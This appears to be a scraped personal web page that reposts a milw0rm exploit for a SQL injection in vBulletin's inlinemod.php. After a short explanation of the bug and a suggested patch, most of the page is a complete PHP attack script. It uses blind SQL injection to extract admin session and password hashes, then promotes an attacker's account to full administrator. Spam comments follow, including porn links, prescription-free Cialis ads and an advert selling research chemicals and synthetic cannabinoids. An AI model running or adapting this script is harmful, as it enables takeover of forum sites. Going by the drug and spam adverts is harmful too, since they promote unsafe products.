http://lav.terra.net.ba/topo/ Image and video hosting by TinyPic
darkmoon - dark-moon.co.nr
Maturski i seminarski radovi
ein Bild
 

input->clean_array_gpc('p', array( 'postids' => TYPE_STR, )); $postids = explode(',', $vbulletin->GPC['postids']); foreach ($postids AS $index => $postid) { if ($postids["$index"] != intval($postid)) { unset($postids["$index"]); } } if (empty($postids)) { eval(standard_error(fetch_error('no_applicable_posts_selected'))); } if (count($postids) > $postlimit) { eval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit))); } break; ... when an element of $postids array is not an integer, it fails to unset() the proper value. An example: output: 99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/* 99999 they match! this because when php tries to comparise a string with an integer it tries to convert the string in its integer value, it chooses the first integer chars of the string itself! so unset() never run! the result is sql injection near lines 3792-3800: ... $posts = $db->query_read_slave(" SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid, thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid, thread.sticky, thread.open, thread.iconid FROM " . TABLE_PREFIX . "post AS post LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid) WHERE postid IN (" . implode(',', $postids) . ") ORDER BY post.dateline "); ... this exploit extract various session hashes from the database to authenticate as admin and to change the privileges of a registered user I could not find a way to see results inside html, so this asks true/false questions to the database, copying posts around threads possible patch, replace: foreach ($postids AS $index => $postid) { if ($postids["$index"] != intval($postid)) { unset($postids["$index"]); } } with: foreach ($postids AS $index => $postid) { $postids["$index"]=(int)$postids["$index"]; } and, some line before: foreach ($threadids AS $index => $threadid) { if ($threadids["$index"] != intval($threadid)) { unset($threadids["$index"]); } } with: foreach ($threadids AS $index => $threadid) { $threadids["$index"]=(int)$threadids["$index"]; } vendor was contacted by email form... */ error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";} } return $exa."rn".$result; } $proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=md5($argv[4]); $forumid=(int)$argv[5]; $existing_post=(int)$argv[6]; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="vb_login_username=$user"; $data.="&vb_login_password="; $data.="&s="; $data.="&do=login"; $data.="&vb_login_md5password=$pass"; $data.="&vb_login_md5password_utf=$pass"; $packet="POST ".$p."login.php HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."login.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i ".$cookie."nn"; if (!eregi("sessionhash",$cookie)){die("failed to login...");}$temp=str_replace(" ","",$cookie);$temp=str_replace("sessionhash","",$temp); $temp=str_replace("lastvisit","",$temp);$temp=str_replace("lastactivity","",$temp);$temp=explode("=",$temp);$temp=explode(";",$temp[1]); $cookie_prefix=trim($temp[1]);echo "cookie prefix -> ".$cookie_prefix."n"; $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $j=1;$uid=""; echo "admim user id -> "; while (!strstr($uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); $temp=explode("showthread.php?t=",$html); $temp2=explode("n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("nunknown query error...");} if (eregi("join date",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("nExploit failed..."); } } $j++; } if (trim($uid)==""){die("nExploit failed...");}else{echo "nvulnerable!";} $uid=intval($uid); function my_encode($my_string) { $encoded="CHAR("; for ($k=0; $k<=strlen($my_string)-1; $k++) { $encoded.=ord($my_string[$k]); if ($k==strlen($my_string)-1) {$encoded.=")";} else {$encoded.=",";} } return $encoded; } $j=1;$my_uid=""; echo "nyour user id -> "; while (!strstr($my_uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=".my_encode($user)."/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (eregi("join date",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("nExploit failed..."); } } $j++; } $my_uid=intval($my_uid); $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$sess_hash=""; echo "nsession hash -> "; while (!strstr($sess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: itrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (eregi("join date",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("nExploit failed..."); } } $j++; } $j=1;$my_hash=""; echo "nuser password hash -> "; while (!strstr($my_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (eregi("join date",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("nExploit failed..."); } } $j++; } $j=1;$cpsess_hash=""; echo "ncp session hash -> "; while (!strstr($cpsess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); $temp=explode("showthread.php?t=",$html); $temp2=explode("n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie."; rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("nunknown query error...");} if (eregi("join date",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("nExploit failed..."); } } $j++; } echo "n"; $packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";rn"; $packet.="Connection: Closernrn"; sendpacketii($packet); $temp=explode("adminhash" value="",$html); $temp2=explode(""",$temp[1]); $adminhash=$temp2[0]; echo "adminhash ->".$adminhash."n"; if ($adminhash<>"") {echo "ndone! you are in... updating ".$user." rights";} else {die("nexploit failed...");} //join to the Administrator group $my_email="suntzu@suntzu.com"; $data ="do=update"; $data.="&adminhash=$adminhash"; $data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid; $data.="&user%5Busername%5D=$user"; $data.="&password="; $data.="&user%5Bemail%5D=$my_email"; $data.="&user%5Blanguageid%5D=0"; $data.="&user%5Busertitle%5D=Admin"; $data.="&user%5Bcustomtitle%5D=0"; $data.="&user%5Bhomepage%5D="; $data.="&user%5Bbirthday%5D%5Bmonth%5D=0"; $data.="&user%5Bbirthday%5D%5Bday%5D="; $data.="&user%5Bbirthday%5D%5Byear%5D="; $data.="&user%5Bshowbirthday%5D=0"; $data.="&user%5Bsignature%5D="; $data.="&user%5Bicq%5D="; $data.="&user%5Baim%5D="; $data.="&user%5Byahoo%5D="; $data.="&user%5Bmsn%5D="; $data.="&user%5Bskype%5D="; $data.="&options%5Bcoppauser%5D=0"; $data.="&user%5Bparentemail%5D=$my_email"; $data.="&user%5Breferrerid%5D="; $data.="&user%5Bipaddress%5D="; $data.="&user%5Bposts%5D=0"; $data.="&userfield%5Bfield1%5D="; $data.="&userfield%5Bfield2%5D="; $data.="&userfield%5Bfield3%5D="; $data.="&userfield%5Bfield4%5D="; $data.="&user%5Busergroupid%5D=6";//primary usergroup, 6=Administrators $data.="&user%5Bdisplaygroupid%5D=-1"; $data.="&user%5Bmembergroupids%5D%5B%5D=5";//secondary usergroup, 5=Super Moderators $data.="&options%5Bshowreputation%5D=1"; $data.="&user%5Breputation%5D=10"; $data.="&user%5Bwarnings%5D=0"; $data.="&user%5Binfractions%5D=0"; $data.="&user%5Bipoints%5D=0"; $data.="&options%5Badminemail%5D=1"; $data.="&options%5Bshowemail%5D=0"; $data.="&options%5Binvisible%5D=0"; $data.="&options%5Bshowvcard%5D=0"; $data.="&options%5Breceivepm%5D=1"; $data.="&options%5Breceivepmbuddies%5D=0"; $data.="&options%5Bemailonpm%5D=0"; $data.="&user%5Bpmpopup%5D=0"; $data.="&options%5Bshowsignatures%5D=1"; $data.="&options%5Bshowavatars%5D=1"; $data.="&options%5Bshowimages%5D=1"; $data.="&user%5Bautosubscribe%5D=-1"; $data.="&user%5Bthreadedmode%5D=0"; $data.="&user%5Bshowvbcode%5D=1"; $data.="&user%5Bstyleid%5D=0"; $data.="&adminoptions%5Badminavatar%5D=0"; $data.="&adminoptions%5Badminprofilepic%5D=0"; $data.="&user%5Btimezoneoffset%5D=0"; $data.="&options%5Bdstauto%5D=1"; $data.="&options%5Bdstonoff%5D=0"; $data.="&user%5Bdaysprune%5D=-1"; $data.="&user%5Bjoindate%5D%5Bmonth%5D=2"; $data.="&user%5Bjoindate%5D%5Bday%5D=26"; $data.="&user%5Bjoindate%5D%5Byear%5D=2007"; $data.="&user%5Bjoindate%5D%5Bhour%5D=14"; $data.="&user%5Bjoindate%5D%5Bminute%5D=39"; $data.="&user%5Blastactivity%5D%5Bmonth%5D=2"; $data.="&user%5Blastactivity%5D%5Bday%5D=26"; $data.="&user%5Blastactivity%5D%5Byear%5D=2007"; $data.="&user%5Blastactivity%5D%5Bhour%5D=14"; $data.="&user%5Blastactivity%5D%5Bminute%5D=58"; $data.="&user%5Blastpost%5D%5Bmonth%5D=0"; $data.="&user%5Blastpost%5D%5Bday%5D="; $data.="&user%5Blastpost%5D%5Byear%5D="; $data.="&user%5Blastpost%5D%5Bhour%5D="; $data.="&user%5Blastpost%5D%5Bminute%5D="; $data.="&userid=".$mu_uid; $data.="&ousergroupid="; $data.="&odisplaygroupid=0"; $data.="&userfield%5Bfield1_set%5D=1"; $data.="&userfield%5Bfield2_set%5D=1"; $data.="&userfield%5Bfield3_set%5D=1"; $data.="&userfield%5Bfield4_set%5D=1"; $packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); sleep(1); //now give full rights to the new Administrator $data ="do=update"; $data.="&adminhash=".$adminhash; $data.="&adminpermissions%5Bcanadminsettings%5D=1"; $data.="&adminpermissions%5Bcanadminstyles%5D=1"; $data.="&adminpermissions%5Bcanadminlanguages%5D=1"; $data.="&adminpermissions%5Bcanadminforums%5D=1"; $data.="&adminpermissions%5Bcanadminthreads%5D=1"; $data.="&adminpermissions%5Bcanadmincalendars%5D=1"; $data.="&adminpermissions%5Bcanadminusers%5D=1"; $data.="&adminpermissions%5Bcanadminpermissions%5D=1"; $data.="&adminpermissions%5Bcanadminfaq%5D=1"; $data.="&adminpermissions%5Bcanadminimages%5D=1"; $data.="&adminpermissions%5Bcanadminbbcodes%5D=1"; $data.="&adminpermissions%5Bcanadmincron%5D=1"; $data.="&adminpermissions%5Bcanadminmaintain%5D=1"; $data.="&adminpermissions%5Bcanadminplugins%5D=1"; $data.="&cssprefs="; $data.="&dismissednews="; $data.="&userid=".$my_uid; $data.="&oldpermissions=98300"; $data.="&adminpermissions%5Bcanadminupgrade%5D=0"; $packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0rn"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn"; $packet.="Referer: http://".$host.$path."profile.phprn"; $packet.="Accept-Language: enrn"; $packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)rn"; $packet.="Host: ".$host."rn"; $packet.="Content-Length: ".strlen($data)."rn"; $packet.="Pragma: no-cachern"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";rn"; $packet.="Connection: Closernrn"; $packet.=$data; sendpacketii($packet); echo "nnow go to http://".$host.$path."admincp/index.php and login to the control panel..."; ?> # milw0rm.com [2007-02-28]



The last comments on this page:
Comment posted by matildaen1, 03/18/2017 at 1:48pm (UTC):
Gay blogging service, Common photos
http://hot.gay.teen.porndairy.in/?post-levi


Comment posted by kristiesx2, 03/16/2017 at 5:08pm (UTC):
Бесплатное порно фото и галереи секса
http://ero-iaponki.porngalleries.top/?page-sydni
Порно фото галереи и эротические рассказы

Comment posted by DennisDep, 03/14/2017 at 11:16am (UTC):
RC-Ðåàãåíòû 1ê70. Update! Newest Research Chemicals 2017 in stock!

Hi,

We wanna notify that our company DPS PHARMA Ltd is having a new stock of RC products such as:
SGT-78, O-2050, 5F-CUMYL-4CN-PINACA, 5F-CYPPICA, a-PPV (a-PhenylpPyroValerone very popular and
strongest analog of a-PVP), ADBFC, ADB-C, AB-C, O-774,
SGT-263, JWH-424, Methyone, 4-MEC, a-PVP (Alfa), MDPV, PV8, a-PVT, bk-MDMA, R-MDMA, Pentedrone,
LD-25, 25I-Nbome, MXE, Ethylone, 4-CMC, 3-CMC, AB-Fubinaca, AB-Pinaca, MAB-Chminaca, SGT-10,
SGT-12, SGT-13, SGT-139, SGT-142, SGT-147, SGT-45, SGT-41, SGT-23, SGT-68, SGT-237, SGT-67, SGT-55.

All products are available directly from our laboratory in China southern area. We can supply
toward any country worldwide (except US and UK) by safest and fast shipping ways as well.

DPS Pharma Co., Ltd|Drugs Power Store

E-mail: dpsmedexport@gmail.com
E-mail: dpschemicals@gmail.com
E-mail: dpspharmaceuticals@gmail.com
E-mail: dpspharmaltd@gmail.com
Jabber: dpspharma@xmpp.jp
Skype: drugspowerstore
VIPole: drugspowerstore
Telegram: drugspowerstore
ICQ: 644359233

Website: https://www.drugspowerstore.com

Comment posted by toddxz18, 03/13/2017 at 1:58pm (UTC):
Started up to date spider's web throw
http://ashlynn.pornpost.in/?page.janelle
singles over 40 dating sites online dating poland sex hookup free free brazil dating nerd dating sites

Comment posted by AshelyBam, 03/13/2017 at 1:07pm (UTC):
Hi everyone!, maybe I am posting it at a wrong place, I just see that members have alive discussion at this place.
I am looking for someone with an experience of MAKING MONEY with EBAY AFFILIATE? I made some cash with 999Webdesign.com and ITUNES before but not much. My friend has suggested to purchase a ebay web designers at flipper.top (here is URL if you are lazy to type it, [url=http://flipper.top/]direct link - "MULTIPLE REVENUE STREAMS WEBSITES")[/url] - I hope it can work! It looks like they are making good MONEY MAKING SITES. please share your opinion and experience? I was not able to find a good looking
FREE AFFILIATE SOFTWARE and flipper.top sounds reliable. Thanks!

Comment posted by Elenason, 03/13/2017 at 8:44am (UTC):
Здравствуйте

Предлагаю вам новую коллекцию платьев 2017 года


Мы делаем сарафаны ручной работы всех размеров.

Более подробно можно узнать [url=https://vk.com/club141523384]тут[/url]
http://cherryblossomsdress.ru

Comment posted by Zqvgpil1, 03/13/2017 at 4:24am (UTC):
[url=http://sadistiv.pl/kocyk-minky/]kocyk minky[/url]  The Grasp regarding Ability code concerning Economics is created on behalf of undergraduates that need to make progress the expertise in efficient system and it is requests. Modish day sixty-one, all and sundry approaches here we are at time, spell enjoying walked taking place instead of 12 months without any transformation. 

Comment posted by ronniett18, 03/13/2017 at 1:23am (UTC):
My new blog sites
http://hotties.pictures.erolove.in/?post-karley
bedpost fuck free download old williamsonians cricket pelicula lesbiana amateur gratis porn black girl 12 y o sexy solo girl

Comment posted by Jackieawato, 03/12/2017 at 9:42pm (UTC):
[url=http://cialiswithoutadoctorprescription.org]cialis no prescription[/url] - cialis online prescription, no prescription cialis.

Comment posted by ScottHomaf, 03/12/2017 at 8:05pm (UTC):
[url=http://cialiswithoutadoctor.net]how to get cialis prescription[/url] - cialis online without prescription, do i need a prescription for cialis.

Comment posted by BigBonusGuala, 03/12/2017 at 5:59am (UTC):
Get NoW your $1500 Bonus -> http://casino1.pro

Comment posted by deborahnw16, 03/12/2017 at 2:33am (UTC):
My new photo blog
http://hotpic.erolove.in/?post.jeanette
youtube sex aebn last girl standing avi busty blake mitchell blue bunny ice cream tube 8 mandingo sex granny woman

Comment posted by RobertSerie, 03/11/2017 at 11:25pm (UTC):
Как хорошо, что наткнулся на ваш сайт, очень много информации почерпнул [url=http://blitz-remont.ru]blitz-remont.ru[/url]

Comment posted by GalenTus, 03/11/2017 at 6:10am (UTC):
Есть такая услуга - добровольное медицинское обслуживание .
Она предполагает, что пациент вносит небольшую сумму за то, что посещает врачей целый год бесплатно.
Однако соцопросы показывают, что лишь 6% жителей Санкт-Петербурга знают о ее существовании.
По какой причине?
Потому что клиникам выгоднее сдирать с людей деньги за каждый визит.
А если честный врач попытается рассказать про добровольное медицинское обслуживание клиенту - это сулит ему увольнением.
Информация о ДМО уже спровоцировала множество скандалов, сразу после того как информацию об услуге распространил один врач.
Его уволили , после того, как он предложил ДМО своему пациенту.
Самое невероятное, что информация по ДМО находились в открытом доступе, просто находили на эту информацию только случайные люди.
Как отстоять свои права?
О правилах предоставления услуги и обязанностях частных клиник можно узнать, сделав запрос в Яндексе: "добровольное медицинское обслуживание".
И именно обслуживание, а не страхование.

34j5c6h86

Comment posted by jesusdt3, 03/09/2017 at 11:47pm (UTC):
Blog about sissy life
cd hypnosis big sister ideas english literature list
http://sissyblog.twiclub.in/?post.lydia
corset tight lacing chastity life style online wholesale clothing youtube hypnotherapy gold panties tattoo t shirts men date younger women sex change women to men

Comment posted by Genryslall, 03/08/2017 at 11:26am (UTC):
<a href=" http://fx-brokers-review.com ">
Review prime brokers of Forex market
</a>

Comment posted by TomekaElity, 03/06/2017 at 11:09pm (UTC):
[url=http://angeladorer.com/]ðóññêîå ïîðíî ìîëîäåíüêèå äåâ÷îíêè[/url]


[url=http://angeladorer.com/]ïîðíî ìîëîäåíüêèå ëåñáèÿíêè[/url]


[url=http://angeladorer.com/]ïîðíî ìîëîäåíüêèõ ñêà÷àòü áåñïëàòíî[/url]

